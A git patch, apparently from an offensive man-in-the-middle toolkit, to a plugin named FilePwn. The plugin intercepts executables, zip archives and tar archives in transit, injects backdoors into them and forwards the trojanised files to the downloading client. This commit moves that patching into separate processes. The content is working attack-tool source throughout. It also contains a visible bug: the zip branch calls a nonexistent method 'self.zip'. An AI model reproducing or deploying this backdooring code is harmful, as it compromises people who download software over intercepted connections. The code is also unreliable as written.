From df9fd2d12a1cdba1aadf8076f54d81205959221b Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Wed, 1 Apr 2015 01:11:40 +0200 Subject: [PATCH] Filepwn plugin now uses multiprocessing to patch binaries --- plugins/FilePwn.py | 55 +++++++++++++++++++++++++++++++++++----------- 1 file changed, 42 insertions(+), 13 deletions(-) diff --git a/plugins/FilePwn.py b/plugins/FilePwn.py index e95ea8b..bd1f6bd 100644 --- a/plugins/FilePwn.py +++ b/plugins/FilePwn.py @@ -65,6 +65,8 @@ import shutil import random import string import tarfile +import multiprocessing + from libs.bdfactory import pebin from libs.bdfactory import elfbin from libs.bdfactory import machobin @@ -85,6 +87,8 @@ class FilePwn(Plugin): '''Called if plugin is enabled, passed the options namespace''' self.options = options + self.patched = multiprocessing.Queue() + #FOR FUTURE USE self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream'] @@ -282,7 +286,8 @@ class FilePwn(Plugin): ) result = targetFile.run_this() - return result + self.patched.put(result) + return except Exception as e: print 'Exception', str(e) @@ -297,7 +302,8 @@ class FilePwn(Plugin): if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']): print "[!] TarFile over allowed size" logging.info("TarFIle maxSize met %s", len(aTarFileBytes)) - return aTarFileBytes + self.patched.put(aTarFileBytes) + return with tempfile.NamedTemporaryFile() as tarFileStorage: tarFileStorage.write(aTarFileBytes) @@ -305,7 +311,8 @@ class FilePwn(Plugin): if not tarfile.is_tarfile(tarFileStorage.name): print '[!] Not a tar file' - return aTarFileBytes + self.patched.put(aTarFileBytes) + return compressionMode = ':' if formatt == 'gz': @@ -322,7 +329,8 @@ class FilePwn(Plugin): if tarFile is None: print '[!] Not a tar file' - return aTarFileBytes + self.patched.put(aTarFileBytes) + return print '[*] Tar file contents and info:' print '[*] Compression:', formatt @@ -408,9 +416,11 @@ class FilePwn(Plugin): if wasPatched is False: # If nothing was changed return the original print "[*] No files were patched forwarding original file" - return aTarFileBytes + self.patched.put(aTarFileBytes) + return else: - return ret + self.patched.put(ret) + return def zip_files(self, aZipFile): "When called will unpack and edit a Zip File and return a zip file" @@ -420,7 +430,8 @@ class FilePwn(Plugin): if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']): print "[!] ZipFile over allowed size" logging.info("ZipFIle maxSize met %s", len(aZipFile)) - return aZipFile + self.patched.put(aZipFile) + return tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8)) tmpDir = '/tmp/' + tmpRan @@ -520,9 +531,11 @@ class FilePwn(Plugin): if wasPatched is False: print "[*] No files were patched forwarding original file" - return aZipFile + self.patched.put(aZipFile) + return else: - return tempZipFile + self.patched.put(tempZipFile) + return def handleResponse(self, request, data): @@ -533,7 +546,13 @@ class FilePwn(Plugin): if self.bytes_have_format(data, 'zip'): logging.info("%s Detected supported zip file type!" % client_ip) - bd_zip = self.zip_files(data) + + process = multiprocessing.Process(target=self.zip, args=(data,)) + process.daemon = True + process.start() + process.join() + bd_zip = self.patched.get() + if bd_zip: logging.info("%s Patching complete, forwarding to client" % client_ip) return {'request': request, 'data': bd_zip} @@ -542,7 +561,13 @@ class FilePwn(Plugin): for tartype in ['gz','bz','tar']: if self.bytes_have_format(data, tartype): logging.info("%s Detected supported tar file type!" % client_ip) - bd_tar = self.tar_files(data) + + process = multiprocessing.Process(target=self.tar_files, args=(data,)) + process.daemon = True + process.start() + process.join() + bd_tar = self.patched.get() + if bd_tar: logging.info("%s Patching complete, forwarding to client" % client_ip) return {'request': request, 'data': bd_tar} @@ -556,8 +581,12 @@ class FilePwn(Plugin): with open(tmpFile, 'w') as f: f.write(data) - patchb = self.binaryGrinder(tmpFile) - + process = multiprocessing.Process(name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile,)) + process.daemon = True + process.start() + process.join() + patchb = self.patched.get() + if patchb: bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read() os.remove('./backdoored/' + os.path.basename(tmpFile))